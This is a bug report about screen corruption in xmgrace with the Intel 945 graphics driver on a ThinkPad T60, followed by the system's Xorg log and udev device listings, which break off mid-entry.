this is quite problematic and makes xmgrace almost unusable.
I have noticed this on my Thinkpad T60 system with the Intel 945 graphics 
card running both in 64 bit and 32 bit modes. I downgraded to version of 2.9.1 of the driver and the corruption problem disappears.  This problem seems to occur with all recent kernels.
I am running xfce4 4.6.2 as a window manager.  I have not tried this with gnome or kde however the bug has been confirmed by other users.  Please see Debian bug #596781 at
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=596781
I am attaching a screenshot of the type of corruption typical when 
gnome-terminal is passed over the corner of an xmgrace window.  The xorg.log below is from the Debian bug report of September 13 when I was using an older kernel.
Cheers
Carlo
-- Package-specific info:
/var/lib/x11/X.roster does not exist.
/var/lib/x11/X.md5sum does not exist.
X server symlink status:
lrwxrwxrwx 1 root root 13 Feb  6  2010 /etc/X11/X -&gt; /usr/bin/Xorg
-rwxr-xr-x 1 root root 1725256 Sep  8 12:28 /usr/bin/Xorg
/var/lib/x11/xorg.conf.roster does not exist.
VGA-compatible devices on PCI bus:
00:02.0 VGA compatible controller: Intel Corporation Mobile 945GM/GMS 
943/940GML Express Integrated Graphics Controller (rev 03)
/etc/X11/xorg.conf does not exist.
Kernel version (/proc/version):
Linux version 2.6.32-trunk-686 (Debian 2.6.32-5) (ben@decadent.org.uk) (gcc 
version 4.3.4 (Debian 4.3.4-6) ) #1 SMP Sun Jan 10 06:32:16 UTC 2010
Xorg X server log files on system:
-rw-r--r-- 1 root root 24065 Sep 13 07:58 /var/log/Xorg.0.log
Contents of most recent Xorg X server log file
/var/log/Xorg.0.log:
X.Org X Server 1.7.7
Release Date: 2010-05-04
X Protocol Version 11 Revision 0
Build Operating System: Linux 2.6.32-5-686 i686 Debian
Current Operating System: Linux hydride 2.6.32-trunk-686 #1 SMP Sun Jan 10 
06:32:16 UTC 2010 i686
Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-trunk-686 
root=UUID=1695179d-d2f7-4201-8333-f804dedf97d1 ro quiet
Build Date: 08 September 2010  07:20:20PM
xorg-server 2:1.7.7-6 (Julien Cristau ) Current version of 
pixman: 0.16.4
	Before reporting problems check http://wiki.x.org
	to make sure that you have the latest version.
Markers: (--) probed (**) from config file (==) default setting
	(++) from command line (!!) notice (II) informational
	(WW) warning (EE) error (NI) not implemented (??) unknown.
(==) Log file: /var/log/Xorg.0.log Time: Mon Sep 13 07:58:13 2010
(==) Using system config directory /usr/share/X11/xorg.conf.d
(==) No Layout section.  Using the first Screen section.
(==) No screen section available. Using defaults.
(**) |--&gt;Screen Default Screen Section (0)
(**) |   |--&gt;Monitor 
(==) No monitor specified for screen Default Screen Section.
	Using a default monitor configuration.
(==) Automatically adding devices
(==) Automatically enabling devices
(WW) The directory /usr/share/fonts/X11/cyrillic does not exist.
	Entry deleted from font path.
(==) FontPath set to:
	/usr/share/fonts/X11/misc
	/usr/share/fonts/X11/100dpi/:unscaled
	/usr/share/fonts/X11/75dpi/:unscaled
	/usr/share/fonts/X11/Type1
	/usr/share/fonts/X11/100dpi
	/usr/share/fonts/X11/75dpi
	/var/lib/defoma/x-ttcidfont-conf.d/dirs/TrueType
	built-ins
(==) ModulePath set to /usr/lib/xorg/modules
(II) The server relies on udev to provide the list of input devices.
	If no devices become available reconfigure udev or disable 
AutoAddDevices.
(II) Loader magic: 0x81ea020
(II) Module ABI versions:
	X.Org ANSI C Emulation: 0.4
	X.Org Video Driver: 6.0
	X.Org XInput driver : 7.0
	X.Org Server Extension : 2.0
(++) using VT number 7
(--) PCI:*(0:0:2:0) 8086:27a2:17aa:201a Intel Corporation Mobile 945GM/GMS 
943/940GML Express Integrated Graphics Controller rev 3 Mem @ 
0xee100000/524288 0xd0000000/268435456 0xee200000/262144 I/O @ 0x00001800/8
(--) PCI: (0:0:2:1) 8086:27a6:17aa:201a Intel Corporation Mobile 945GM/GMS/GME 
943/940GML Express Integrated Graphics Controller rev 3 Mem @ 
0xee180000/524288
(II) Open ACPI successful (/var/run/acpid.socket)
(II) LoadModule: extmod
(II) Loading /usr/lib/xorg/modules/extensions/libextmod.so
(II) Module extmod: vendor=X.Org Foundation
	compiled for 1.7.7 module version = 1.0.0
	Module class: X.Org Server Extension
	ABI class: X.Org Server Extension version 2.0
(II) Loading extension SELinux
(II) Loading extension MIT-SCREEN-SAVER
(II) Loading extension XFree86-VidModeExtension
(II) Loading extension XFree86-DGA
(II) Loading extension DPMS
(II) Loading extension XVideo
(II) Loading extension XVideo-MotionCompensation
(II) Loading extension X-Resource
(II) LoadModule: dbe
(II) Loading /usr/lib/xorg/modules/extensions/libdbe.so
(II) Module dbe: vendor=X.Org Foundation
	compiled for 1.7.7 module version = 1.0.0
	Module class: X.Org Server Extension
	ABI class: X.Org Server Extension version 2.0
(II) Loading extension DOUBLE-BUFFER
(II) LoadModule: glx
(II) Loading /usr/lib/xorg/modules/extensions/libglx.so
(II) Module glx: vendor=X.Org Foundation
	compiled for 1.7.7 module version = 1.0.0
	ABI class: X.Org Server Extension version 2.0
(==) AIGLX enabled
(II) Loading extension GLX
(II) LoadModule: record
(II) Loading /usr/lib/xorg/modules/extensions/librecord.so
(II) Module record: vendor=X.Org Foundation
	compiled for 1.7.7 module version = 1.13.0
	Module class: X.Org Server Extension
	ABI class: X.Org Server Extension version 2.0
(II) Loading extension RECORD
(II) LoadModule: dri
(II) Loading /usr/lib/xorg/modules/extensions/libdri.so
(II) Module dri: vendor=X.Org Foundation
	compiled for 1.7.7 module version = 1.0.0
	ABI class: X.Org Server Extension version 2.0
(II) Loading extension XFree86-DRI
(II) LoadModule: dri2
(II) Loading /usr/lib/xorg/modules/extensions/libdri2.so
(II) Module dri2: vendor=X.Org Foundation
	compiled for 1.7.7 module version = 1.1.0
	ABI class: X.Org Server Extension version 2.0
(II) Loading extension DRI2
(==) Matched intel as autoconfigured driver 0
(==) Matched vesa as autoconfigured driver 1
(==) Matched fbdev as autoconfigured driver 2
(==) Assigned the driver to the xf86ConfigLayout
(II) LoadModule: intel
(II) Loading /usr/lib/xorg/modules/drivers/intel_drv.so
(II) Module intel: vendor=X.Org Foundation
	compiled for 1.7.7 module version = 2.12.0
	Module class: X.Org Video Driver
	ABI class: X.Org Video Driver version 6.0
(II) LoadModule: vesa
(II) Loading /usr/lib/xorg/modules/drivers/vesa_drv.so
(II) Module vesa: vendor=X.Org Foundation
	compiled for 1.7.7 module version = 2.3.0
	Module class: X.Org Video Driver
	ABI class: X.Org Video Driver version 6.0
(II) LoadModule: fbdev
(II) Loading /usr/lib/xorg/modules/drivers/fbdev_drv.so
(II) Module fbdev: vendor=X.Org Foundation
	compiled for 1.7.6.901 module version = 0.4.2
	ABI class: X.Org Video Driver version 6.0
(II) intel: Driver for Intel Integrated Graphics Chipsets: i810
	i810-dc100 i810e i815 i830M 845G 854 852GM/855GM 865G 915G
	E7221 (i915) 915GM 945G 945GM 945GME Pineview GM Pineview G
	965G G35 965Q 946GZ 965GM 965GME/GLE G33 Q35 Q33 GM45
	4 Series G45/G43 Q45/Q43 G41 B43 Clarkdale Arrandale
(II) VESA: driver for VESA chipsets: vesa
(II) FBDEV: driver for framebuffer: fbdev
(II) Primary Device is: PCI 00@00:02:0
(WW) Falling back to old probe method for vesa
(WW) Falling back to old probe method for fbdev
(II) Loading sub module fbdevhw
(II) LoadModule: fbdevhw
(II) Loading /usr/lib/xorg/modules/linux/libfbdevhw.so
(II) Module fbdevhw: vendor=X.Org Foundation
	compiled for 1.7.7 module version = 0.0.2
	ABI class: X.Org Video Driver version 6.0
drmOpenDevice: node name is /dev/dri/card0
drmOpenDevice: open result is 9 (OK)
drmOpenByBusid: Searching for BusID pci:0000:00:02.0
drmOpenDevice: node name is /dev/dri/card0
drmOpenDevice: open result is 9 (OK)
drmOpenByBusid: drmOpenMinor returns 9
drmOpenByBusid: drmGetBusid reports pci:0000:00:02.0
(II) intel(0): Creating default Display subsection in Screen section
	Default Screen Section for depth/fbbpp 24/32
(==) intel(0): Depth 24 (--) framebuffer bpp 32
(==) intel(0): RGB weight 888
(==) intel(0): Default visual is TrueColor
(II) intel(0): Integrated Graphics Chipset: Intel(R) 945GM
(--) intel(0): Chipset: 945GM
(==) intel(0): video overlay key set to 0x101fe
(II) intel(0): Output VGA1 has no monitor section
(II) intel(0): Output LVDS1 has no monitor section
(II) intel(0): found backlight control interface 
/sys/class/backlight/acpi_video0
(II) intel(0): Output DVI1 has no monitor section
(II) intel(0): EDID for output VGA1
(II) intel(0): EDID for output LVDS1
(II) intel(0): Manufacturer: IBM  Model: 2887  Serial#: 0
(II) intel(0): Year: 2005  Week: 0
(II) intel(0): EDID Version: 1.3
(II) intel(0): Digital Display Input
(II) intel(0): Max Image Size [cm]: horiz.: 33  vert.: 21
(II) intel(0): Gamma: 2.20
(II) intel(0): No DPMS capabilities specified
(II) intel(0): Supported color encodings: RGB 4:4:4 YCrCb 4:4:4 (II) intel(0): 
First detailed timing is preferred mode
(II) intel(0): redX: 0.596 redY: 0.347   greenX: 0.335 greenY: 0.543
(II) intel(0): blueX: 0.158 blueY: 0.143   whiteX: 0.313 whiteY: 0.329
(II) intel(0): Manufacturer's mask: 0
(II) intel(0): Supported detailed timing:
(II) intel(0): clock: 122.0 MHz   Image Size:  331 x 207 mm
(II) intel(0): h_active: 1680  h_sync: 1712  h_sync_end 1776 h_blank_end 1904 
h_border: 0
(II) intel(0): v_active: 1050  v_sync: 1051  v_sync_end 1054 v_blanking: 1066 
v_border: 0
(II) intel(0): Supported detailed timing:
(II) intel(0): clock: 101.7 MHz   Image Size:  331 x 207 mm
(II) intel(0): h_active: 1680  h_sync: 1712  h_sync_end 1776 h_blank_end 1904 
h_border: 0
(II) intel(0): v_active: 1050  v_sync: 1051  v_sync_end 1054 v_blanking: 1066 
v_border: 0
(II) intel(0): Unknown vendor-specific block f
(II) intel(0):  LP154W02-TL06
(II) intel(0): EDID (in hex):
(II) intel(0): 	00ffffffffffff00244d872800000000
(II) intel(0): 	000f0103802115780abca59858558b28
(II) intel(0): 	24505400000001010101010101010101
(II) intel(0): 	010101010101a82f90e0601a10402040
(II) intel(0): 	13004bcf10000019b72790e0601a1040
(II) intel(0): 	204013004bcf100000190000000f00b3
(II) intel(0): 	0a32b30a28140100320c0000000000fe
(II) intel(0): 	004c503135345730322d544c3036007f
(II) intel(0): Not using default mode 320x240 (doublescan mode not supported)
(II) intel(0): Not using default mode 400x300 (doublescan mode not supported)
(II) intel(0): Not using default mode 400x300 (doublescan mode not supported)
(II) intel(0): Not using default mode 512x384 (doublescan mode not supported)
(II) intel(0): Not using default mode 640x480 (doublescan mode not supported)
(II) intel(0): Not using default mode 640x512 (doublescan mode not supported)
(II) intel(0): Not using default mode 800x600 (doublescan mode not supported)
(II) intel(0): Not using default mode 896x672 (doublescan mode not supported)
(II) intel(0): Not using default mode 928x696 (doublescan mode not supported)
(II) intel(0): Not using default mode 960x720 (doublescan mode not supported)
(II) intel(0): Not using default mode 576x432 (doublescan mode not supported)
(II) intel(0): Not using default mode 680x384 (doublescan mode not supported)
(II) intel(0): Not using default mode 680x384 (doublescan mode not supported)
(II) intel(0): Not using default mode 700x525 (doublescan mode not supported)
(II) intel(0): Not using default mode 720x450 (doublescan mode not supported)
(II) intel(0): Not using default mode 800x512 (doublescan mode not supported)
(II) intel(0): Not using default mode 840x525 (doublescan mode not supported)
(II) intel(0): Not using default mode 840x525 (doublescan mode not supported)
(II) intel(0): Not using default mode 960x540 (doublescan mode not supported)
(II) intel(0): Not using default mode 960x600 (doublescan mode not supported)
(II) intel(0): Not using default mode 1024x768 (doublescan mode not 
supported)
(II) intel(0): Printing probed modes for output LVDS1
(II) intel(0): Modeline 1680x1050x60.1  122.00  1680 1712 1776 1904  1050 
1051 1054 1066 -hsync -vsync (64.1 kHz)
(II) intel(0): Modeline 1680x1050x60.0  146.25  1680 1784 1960 2240  1050 
1053 1059 1089 -hsync +vsync (65.3 kHz)
(II) intel(0): Modeline 1680x1050x59.9  119.00  1680 1728 1760 1840  1050 
1053 1059 1080 +hsync -vsync (64.7 kHz)
(II) intel(0): Modeline 1680x1050x50.1  101.67  1680 1712 1776 1904  1050 
1051 1054 1066 -hsync -vsync (53.4 kHz)
(II) intel(0): Modeline 1600x1024x60.2  103.12  1600 1600 1656 1664  1024 
1024 1029 1030 +hsync +vsync (62.0 kHz)
(II) intel(0): Modeline 1400x1050x60.0  122.00  1400 1488 1640 1880  1050 
1052 1064 1082 +hsync +vsync (64.9 kHz)
(II) intel(0): Modeline 1280x1024x60.0  108.00  1280 1328 1440 1688  1024 
1025 1028 1066 +hsync +vsync (64.0 kHz)
(II) intel(0): Modeline 1440x900x59.9  106.50  1440 1520 1672 1904  900 903 
909 934 -hsync +vsync (55.9 kHz)
(II) intel(0): Modeline 1280x960x60.0  108.00  1280 1376 1488 1800  960 961 
964 1000 +hsync +vsync (60.0 kHz)
(II) intel(0): Modeline 1360x768x59.8   84.75  1360 1432 1568 1776  768 771 
781 798 -hsync +vsync (47.7 kHz)
(II) intel(0): Modeline 1360x768x60.0   72.00  1360 1408 1440 1520  768 771 
781 790 +hsync -vsync (47.4 kHz)
(II) intel(0): Modeline 1152x864x60.0   81.62  1152 1216 1336 1520  864 865 
868 895 -hsync +vsync (53.7 kHz)
(II) intel(0): Modeline 1024x768x60.0   65.00  1024 1048 1184 1344  768 771 
777 806 -hsync -vsync (48.4 kHz)
(II) intel(0): Modeline 800x600x60.3   40.00  800 840 968 1056  600 601 605 
628 +hsync +vsync (37.9 kHz)
(II) intel(0): Modeline 800x600x56.2   36.00  800 824 896 1024  600 601 603 
625 +hsync +vsync (35.2 kHz)
(II) intel(0): Modeline 640x480x59.9   25.18  640 656 752 800  480 490 492 
525 -hsync -vsync (31.5 kHz)
(II) intel(0): EDID for output DVI1
(II) intel(0): Output VGA1 disconnected
(II) intel(0): Output LVDS1 connected
(II) intel(0): Output DVI1 disconnected
(II) intel(0): Using exact sizes for initial modes
(II) intel(0): Output LVDS1 using initial mode 1680x1050
(II) intel(0): Using default gamma of (1.0 1.0 1.0) unless otherwise stated.
(==) intel(0): DPI set to (96 96)
(II) Loading sub module fb
(II) LoadModule: fb
(II) Loading /usr/lib/xorg/modules/libfb.so
(II) Module fb: vendor=X.Org Foundation
	compiled for 1.7.7 module version = 1.0.0
	ABI class: X.Org ANSI C Emulation version 0.4
(II) UnloadModule: vesa
(II) Unloading /usr/lib/xorg/modules/drivers/vesa_drv.so
(II) UnloadModule: fbdev
(II) Unloading /usr/lib/xorg/modules/drivers/fbdev_drv.so
(II) UnloadModule: fbdevhw
(II) Unloading /usr/lib/xorg/modules/linux/libfbdevhw.so
(==) Depth 24 pixmap format is 32 bpp
(II) intel(0): [DRI2] Setup complete
(**) intel(0): Tiling enabled
(**) intel(0): SwapBuffers wait enabled
(==) intel(0): VideoRam: 262144 KB
(II) intel(0): Allocated new frame buffer 1728x1050 stride 8192 tiled
(II) UXA(0): Driver registered support for the following operations:
(II)         solid
(II)         copy
(II)         composite (RENDER acceleration)
(II)         put_image
(II)         get_image
(==) intel(0): Backing store disabled
(==) intel(0): Silken mouse enabled
(II) intel(0): Initializing HW Cursor
(II) intel(0): RandR 1.2 enabled ignore the following RandR disabled message.
(==) intel(0): DPMS enabled
(==) intel(0): Intel XvMC decoder disabled
(II) intel(0): Set up textured video
(II) intel(0): direct rendering: DRI2 Enabled
(--) RandR disabled
(II) Initializing built-in extension Generic Event Extension
(II) Initializing built-in extension SHAPE
(II) Initializing built-in extension MIT-SHM
(II) Initializing built-in extension XInputExtension
(II) Initializing built-in extension XTEST
(II) Initializing built-in extension BIG-REQUESTS
(II) Initializing built-in extension SYNC
(II) Initializing built-in extension XKEYBOARD
(II) Initializing built-in extension XC-MISC
(II) Initializing built-in extension XINERAMA
(II) Initializing built-in extension XFIXES
(II) Initializing built-in extension RENDER
(II) Initializing built-in extension RANDR
(II) Initializing built-in extension COMPOSITE
(II) Initializing built-in extension DAMAGE
SELinux: Disabled on system not enabling in X server
(II) AIGLX: enabled GLX_MESA_copy_sub_buffer
(II) AIGLX: enabled GLX_SGI_make_current_read
(II) AIGLX: enabled GLX_SGI_swap_control and GLX_MESA_swap_control
(II) AIGLX: GLX_EXT_texture_from_pixmap backed by buffer objects
(II) AIGLX: Loaded and initialized /usr/lib/dri/i915_dri.so
(II) GLX: Initialized DRI2 GL provider for screen 0
(II) intel(0): Setting screen physical size to 444 x 277
(II) config/udev: Adding input device Power Button (/dev/input/event4)
(**) Power Button: Applying InputClass evdev keyboard catchall
(II) LoadModule: evdev
(II) Loading /usr/lib/xorg/modules/input/evdev_drv.so
(II) Module evdev: vendor=X.Org Foundation
	compiled for 1.7.6.901 module version = 2.3.2
	Module class: X.Org XInput Driver
	ABI class: X.Org XInput driver version 7.0
(**) Power Button: always reports core events
(**) Power Button: Device: /dev/input/event4
(II) Power Button: Found keys
(II) Power Button: Configuring as keyboard
(II) XINPUT: Adding extended input device Power Button (type: KEYBOARD)
(**) Option xkb_rules evdev
(**) Option xkb_model pc104
(**) Option xkb_layout us
(II) config/udev: Adding input device Video Bus (/dev/input/event5)
(**) Video Bus: Applying InputClass evdev keyboard catchall
(**) Video Bus: always reports core events
(**) Video Bus: Device: /dev/input/event5
(II) Video Bus: Found keys
(II) Video Bus: Configuring as keyboard
(II) XINPUT: Adding extended input device Video Bus (type: KEYBOARD)
(**) Option xkb_rules evdev
(**) Option xkb_model pc104
(**) Option xkb_layout us
(II) config/udev: Adding input device Lid Switch (/dev/input/event2)
(II) No input driver/identifier specified (ignoring)
(II) config/udev: Adding input device Sleep Button (/dev/input/event3)
(**) Sleep Button: Applying InputClass evdev keyboard catchall
(**) Sleep Button: always reports core events
(**) Sleep Button: Device: /dev/input/event3
(II) Sleep Button: Found keys
(II) Sleep Button: Configuring as keyboard
(II) XINPUT: Adding extended input device Sleep Button (type: KEYBOARD)
(**) Option xkb_rules evdev
(**) Option xkb_model pc104
(**) Option xkb_layout us
(II) config/udev: Adding input device HDA Digital PCBeep (/dev/input/event10)
(II) No input driver/identifier specified (ignoring)
(II) config/udev: Adding input device Logitech USB Optical Mouse 
(/dev/input/event9)
(**) Logitech USB Optical Mouse: Applying InputClass evdev pointer catchall
(**) Logitech USB Optical Mouse: always reports core events
(**) Logitech USB Optical Mouse: Device: /dev/input/event9
(II) Logitech USB Optical Mouse: Found 3 mouse buttons
(II) Logitech USB Optical Mouse: Found scroll wheel(s)
(II) Logitech USB Optical Mouse: Found relative axes
(II) Logitech USB Optical Mouse: Found x and y relative axes
(II) Logitech USB Optical Mouse: Configuring as mouse
(**) Logitech USB Optical Mouse: YAxisMapping: buttons 4 and 5
(**) Logitech USB Optical Mouse: EmulateWheelButton: 4 EmulateWheelInertia: 
10 EmulateWheelTimeout: 200
(II) XINPUT: Adding extended input device Logitech USB Optical Mouse (type: 
MOUSE)
(II) Logitech USB Optical Mouse: initialized for relative axes.
(II) config/udev: Adding input device Logitech USB Optical Mouse 
(/dev/input/mouse1)
(II) No input driver/identifier specified (ignoring)
(II) config/udev: Adding input device Microsoft LifeCam VX-5000 
(/dev/input/event8)
(**) Microsoft LifeCam VX-5000: Applying InputClass evdev keyboard catchall
(**) Microsoft LifeCam VX-5000: always reports core events
(**) Microsoft LifeCam VX-5000: Device: /dev/input/event8
(II) Microsoft LifeCam VX-5000: Found keys
(II) Microsoft LifeCam VX-5000: Configuring as keyboard
(II) XINPUT: Adding extended input device Microsoft LifeCam VX-5000 (type: 
KEYBOARD)
(**) Option xkb_rules evdev
(**) Option xkb_model pc104
(**) Option xkb_layout us
(II) config/udev: Adding input device hdaps (/dev/input/event12)
(II) No input driver/identifier specified (ignoring)
(II) config/udev: Adding input device hdaps (/dev/input/js0)
(II) No input driver/identifier specified (ignoring)
(II) config/udev: Adding input device AT Translated Set 2 keyboard 
(/dev/input/event0)
(**) AT Translated Set 2 keyboard: Applying InputClass evdev keyboard 
catchall
(**) AT Translated Set 2 keyboard: always reports core events
(**) AT Translated Set 2 keyboard: Device: /dev/input/event0
(II) AT Translated Set 2 keyboard: Found keys
(II) AT Translated Set 2 keyboard: Configuring as keyboard
(II) XINPUT: Adding extended input device AT Translated Set 2 keyboard (type: 
KEYBOARD)
(**) Option xkb_rules evdev
(**) Option xkb_model pc104
(**) Option xkb_layout us
(II) config/udev: Adding input device SynPS/2 Synaptics TouchPad 
(/dev/input/event7)
(**) SynPS/2 Synaptics TouchPad: Applying InputClass evdev touchpad catchall
(**) SynPS/2 Synaptics TouchPad: Applying InputClass touchpad catchall
(II) LoadModule: synaptics
(II) Loading /usr/lib/xorg/modules/input/synaptics_drv.so
(II) Module synaptics: vendor=X.Org Foundation
	compiled for 1.7.6.901 module version = 1.2.2
	Module class: X.Org XInput Driver
	ABI class: X.Org XInput driver version 7.0
(II) Synaptics touchpad driver version 1.2.2
(**) Option Device /dev/input/event7
(II) SynPS/2 Synaptics TouchPad: x-axis range 1472 - 5472
(II) SynPS/2 Synaptics TouchPad: y-axis range 1408 - 4448
(II) SynPS/2 Synaptics TouchPad: pressure range 0 - 255
(II) SynPS/2 Synaptics TouchPad: finger width range 0 - 0
(II) SynPS/2 Synaptics TouchPad: buttons: left right middle double triple
(--) SynPS/2 Synaptics TouchPad: touchpad found
(**) SynPS/2 Synaptics TouchPad: always reports core events
(II) XINPUT: Adding extended input device SynPS/2 Synaptics TouchPad (type: 
TOUCHPAD)
(**) SynPS/2 Synaptics TouchPad: (accel) keeping acceleration scheme 1
(**) SynPS/2 Synaptics TouchPad: (accel) acceleration profile 0
(**) SynPS/2 Synaptics TouchPad: (accel) acceleration factor: 2.000
(**) SynPS/2 Synaptics TouchPad: (accel) acceleration threshold: 4
(--) SynPS/2 Synaptics TouchPad: touchpad found
(II) config/udev: Adding input device SynPS/2 Synaptics TouchPad 
(/dev/input/mouse0)
(**) SynPS/2 Synaptics TouchPad: Applying InputClass touchpad catchall
(II) Synaptics touchpad driver version 1.2.2
SynPS/2 Synaptics TouchPad no synaptics event device found
(**) Option Device /dev/input/mouse0
Query no Synaptics: 6003C8
(--) SynPS/2 Synaptics TouchPad: no supported touchpad found
(EE) SynPS/2 Synaptics TouchPad Unable to query/initialize Synaptics hardware.
(EE) PreInit failed for input device SynPS/2 Synaptics TouchPad
(II) UnloadModule: synaptics
(II) config/udev: Adding input device PS/2 Generic Mouse (/dev/input/event11)
(**) PS/2 Generic Mouse: Applying InputClass evdev pointer catchall
(**) PS/2 Generic Mouse: always reports core events
(**) PS/2 Generic Mouse: Device: /dev/input/event11
(II) PS/2 Generic Mouse: Found 3 mouse buttons
(II) PS/2 Generic Mouse: Found relative axes
(II) PS/2 Generic Mouse: Found x and y relative axes
(II) PS/2 Generic Mouse: Configuring as mouse
(**) PS/2 Generic Mouse: YAxisMapping: buttons 4 and 5
(**) PS/2 Generic Mouse: EmulateWheelButton: 4 EmulateWheelInertia: 10 
EmulateWheelTimeout: 200
(II) XINPUT: Adding extended input device PS/2 Generic Mouse (type: MOUSE)
(II) PS/2 Generic Mouse: initialized for relative axes.
(II) config/udev: Adding input device PS/2 Generic Mouse (/dev/input/mouse2)
(II) No input driver/identifier specified (ignoring)
(II) config/udev: Adding input device PC Speaker (/dev/input/event1)
(II) No input driver/identifier specified (ignoring)
(II) config/udev: Adding input device ACPI Virtual Keyboard Device 
(/dev/input/event13)
(**) ACPI Virtual Keyboard Device: Applying InputClass evdev keyboard 
catchall
(**) ACPI Virtual Keyboard Device: always reports core events
(**) ACPI Virtual Keyboard Device: Device: /dev/input/event13
(II) ACPI Virtual Keyboard Device: Found keys
(II) ACPI Virtual Keyboard Device: Configuring as keyboard
(II) XINPUT: Adding extended input device ACPI Virtual Keyboard Device (type: 
KEYBOARD)
(**) Option xkb_rules evdev
(**) Option xkb_model pc104
(**) Option xkb_layout us
(II) config/udev: Adding input device ThinkPad Extra Buttons 
(/dev/input/event6)
(**) ThinkPad Extra Buttons: Applying InputClass evdev keyboard catchall
(**) ThinkPad Extra Buttons: always reports core events
(**) ThinkPad Extra Buttons: Device: /dev/input/event6
(II) ThinkPad Extra Buttons: Found keys
(II) ThinkPad Extra Buttons: Configuring as keyboard
(II) XINPUT: Adding extended input device ThinkPad Extra Buttons (type: 
KEYBOARD)
(**) Option xkb_rules evdev
(**) Option xkb_model pc104
(**) Option xkb_layout us
(II) intel(0): EDID vendor IBM prod id 10375
(II) intel(0): Printing DDC gathered Modelines:
(II) intel(0): Modeline 1680x1050x0.0  122.00  1680 1712 1776 1904  1050 1051 
1054 1066 -hsync -vsync (64.1 kHz)
(II) intel(0): Modeline 1680x1050x0.0  101.67  1680 1712 1776 1904  1050 1051 
1054 1066 -hsync -vsync (53.4 kHz)
(II) intel(0): EDID vendor IBM prod id 10375
(II) intel(0): Printing DDC gathered Modelines:
(II) intel(0): Modeline 1680x1050x0.0  122.00  1680 1712 1776 1904  1050 1051 
1054 1066 -hsync -vsync (64.1 kHz)
(II) intel(0): Modeline 1680x1050x0.0  101.67  1680 1712 1776 1904  1050 1051 
1054 1066 -hsync -vsync (53.4 kHz)
udev information:
P: /devices/LNXSYSTM:00/LNXPWRBN:00/input/input4/event4
N: input/event4
S: char/13:68
E: UDEV_LOG=3
E: DEVPATH=/devices/LNXSYSTM:00/LNXPWRBN:00/input/input4/event4
E: SUBSYSTEM=input
E: DEVNAME=input/event4
E: ID_INPUT=1
E: ID_INPUT_KEY=1
E: XKBMODEL=pc104
E: XKBLAYOUT=us
E: MAJOR=13
E: MINOR=68
E: DEVLINKS=/dev/char/13:68
E: DMI_VENDOR=LENOVO
P: /devices/LNXSYSTM:00/LNXSYBUS:00/PNP0A08:00/LNXVIDEO:00/input/input5/event5
N: input/event5
S: char/13:69
E: UDEV_LOG=3
E: 
DEVPATH=/devices/LNXSYSTM:00/LNXSYBUS:00/PNP0A08:00/LNXVIDEO:00/input/input5/event5
E: SUBSYSTEM=input
E: DEVNAME=input/event5
E: ID_INPUT=1
E: ID_INPUT_KEY=1
E: XKBMODEL=pc104
E: XKBLAYOUT=us
E: MAJOR=13
E: MINOR=69
E: DEVLINKS=/dev/char/13:69
E: DMI_VENDOR=LENOVO
P: /devices/LNXSYSTM:00/LNXSYBUS:00/PNP0C0D:00/input/input2/event2
N: input/event2
S: char/13:66
E: UDEV_LOG=3
E: DEVPATH=/devices/LNXSYSTM:00/LNXSYBUS:00/PNP0C0D:00/input/input2/event2
E: SUBSYSTEM=input
E: DEVNAME=input/event2
E: ID_INPUT=1
E: DMI_VENDOR=LENOVO
E: MAJOR=13
E: MINOR=66
E: DEVLINKS=/dev/char/13:66
P: /devices/LNXSYSTM:00/LNXSYBUS:00/PNP0C0E:00/input/input3/event3
N: input/event3
S: char/13:67
E: UDEV_LOG=3
E: DEVPATH=/devices/LNXSYSTM:00/LNXSYBUS:00/PNP0C0E:00/input/input3/event3
E: SUBSYSTEM=input
E: DEVNAME=input/event3
E: ID_INPUT=1
E: ID_INPUT_KEY=1
E: XKBMODEL=pc104
E: XKBLAYOUT=us
E: MAJOR=13
E: MINOR=67
E: DEVLINKS=/dev/char/13:67
E: DMI_VENDOR=LENOVO
P: /devices/pci0000:00/0000:00:1b.0/input/input10/event10
N: input/event10
S: char/13:74
E: UDEV_LOG=3
E: DEVPATH=/devices/pci0000:00/0000:00:1b.0/input/input10/event10
E: SUBSYSTEM=input
E: DEVNAME=input/event10
E: ID_INPUT=1
E: ID_PATH=pci-0000:00:1b.0
E: DMI_VENDOR=LENOVO
E: MAJOR=13
E: MINOR=74
E: DEVLINKS=/dev/char/13:74
P: /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1:1.0/input/input9/event9
N: input/event9
S: char/13:73
S: input/by-id/usb-Logitech_USB_Optical_Mouse-event-mouse
S: input/by-path/pci-0000:00:1d.0-usb-0:1:1.0-event-mouse
E: UDEV_LOG=3
E: 
DEVPATH=/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1:1.0/input/input9/event9
E: SUBSYSTEM=input
E: DEVNAME=input/event9
E: ID_INPUT=1
E: ID_INPUT_MOUSE=1
E: ID_VENDOR=Logitech
E: ID_VENDOR_ENC=Logitech
E: ID_VENDOR_ID=046d
E: ID_MODEL=USB_Optical_Mouse
E: ID_MODEL_ENC=USB\x20Optical\x20Mouse
E: ID_MODEL_ID=c018
E: ID_REVISION=4301
E: ID_SERIAL=Logitech_USB_Optical_Mouse
E: ID_TYPE=hid
E: ID_BUS=usb
E: ID_USB_INTERFACES=:030102:
E: ID_USB_INTERFACE_NUM=00
E: ID_USB_DRIVER=usbhid
E: ID_PATH=pci-0000:00:1d.0-usb-0:1:1.0
E: MAJOR=13
E: MINOR=73
E: DEVLINKS=/dev/char/13:73 
/dev/input/by-id/usb-Logitech_USB_Optical_Mouse-event-mouse 
/dev/input/by-path/pci-0000:00:1d.0-usb-0:1:1.0-event-mouse
P: /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1:1.0/input/input9/mouse1
N: input/mouse1
S: char/13:33
S: input/by-id/usb-Logitech_USB_Optical_Mouse-mouse
S: input/by-path/pci-0000:00:1d.0-usb-0:1:1.0-mouse
E: UDEV_LOG=3
E: 
DEVPATH=/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1:1.0/input/input9/mouse1
E: SUBSYSTEM=input
E: DEVNAME=input/mouse1
E: ID_INPUT=1
E: ID_INPUT_MOUSE=1
E: ID_VENDOR=Logitech
E: ID_VENDOR_ENC=Logitech
E: ID_VENDOR_ID=046d
E: ID_MODEL=USB_Optical_Mouse
E: ID_MODEL_ENC=USB\x20Optical\x20Mouse
E: ID_MODEL_ID=c018
E: ID_REVISION=4301
E: ID_SERIAL=Logitech_USB_Optical_Mouse
E: ID_TYPE=hid
E: ID_BUS=usb
E: ID_USB_INTERFACES=:030102:
